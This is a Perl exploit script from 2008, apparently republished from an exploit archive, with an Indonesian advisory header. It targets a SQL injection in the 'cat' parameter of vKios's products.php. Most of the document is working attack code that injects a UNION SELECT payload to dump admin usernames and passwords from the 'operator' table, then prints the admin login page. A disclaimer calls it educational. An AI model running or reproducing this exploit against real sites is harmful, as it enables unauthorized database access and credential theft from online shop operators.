Select Page
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# vKios < = 2.0.0  (products.php cat) Remote SQL Injection Exploit
# Waktu		:  Feb 8 2008 10:00PM
# Software	:  vKios
# Versi		:  <= 2.0.0
# Vendor 	:  http://www.vkios.com/
#
# ------------------------------------
# Audit Oleh 	:  NTOS-Team aka newhack|staff
# Lokasi	:  Indonesia | http://newhack.org
# Penjelasan	:
#
# vKios adalah aplikasi CMS untuk membangun website toko online dalam sekejap
# variabel "cat" pada berkas "products.php" tidak tersaring dengan sempurna
# sehingga pengunjung site dapat memanipulasi pernyataan SQL melalui URL secara Remote
# Contoh ;
# http://site.korban/products.php?cat=[SQLI]
#
# -------------------------------------
# Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari,
# Indonesian Newhack Technology tidak bertanggung jawab akan kerusakan
# yang diakibatkan dari penyalahgunaan exploit oleh pihak lain
#
# => NTOS-Team aka newhack|staff ->[fl3xu5,k1tk4t,opt1lc]
# 
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[2])
{
 print "n  |-------------------------------------------------------|";
 print "n  |            Indonesian Newhack Technology              |";
 print "n  |-------------------------------------------------------|";
 print "n  | vKios (products.php cat) Remote SQL Injection Exploit |";
 print "n  |                Coded by NTOS-Team                     |";
 print "n  |-------------------------------------------------------|";
 print "n[!] ";
 print "n[!] Penggunaan : perl vkios.pl [Site] [Path] [Option]";
 print "n[!] [Option] 2 = versi > 1.3  |  1 = versi < 1.3 ";
 print "n[!] Contoh     : perl vkios.pl localhost /vkios/ -o 1";
 print "n[!] ";
 print "n";
 exit;
}
$site = $ARGV[0]; # Site Target
$path = $ARGV[1]; # Path direktori vKios
%options = ();
GetOptions(%options, "o=i",);
if($options{"o"} && $options{"o"} == 1) { $injek = "http://".$site.$path."products.php?cat=-1
%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9%20from%20operator"; }
if($options{"o"} && $options{"o"} == 2) { $injek = "http://".$site.$path."products.php?cat=-1
%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9,10%20from%20operator"; }

$www = new LWP::UserAgent;
$sql = $injek;
print "nn [Konek] Injeksi SQL n";
$res = $www -> get($sql) or err();
$res -> content() =~ /t4mu (.*?) gel4p/ or err();
print "n [Info.] username:password";
print "n [Hasil] $1 n";
print "n [Login] http://".$site.$path."admin/ nn";

sub err()
{
print "n [-] Exploit gagal :( - cari yang lain!";
exit();
}
see more at http://milw0rm.com/exploits/5101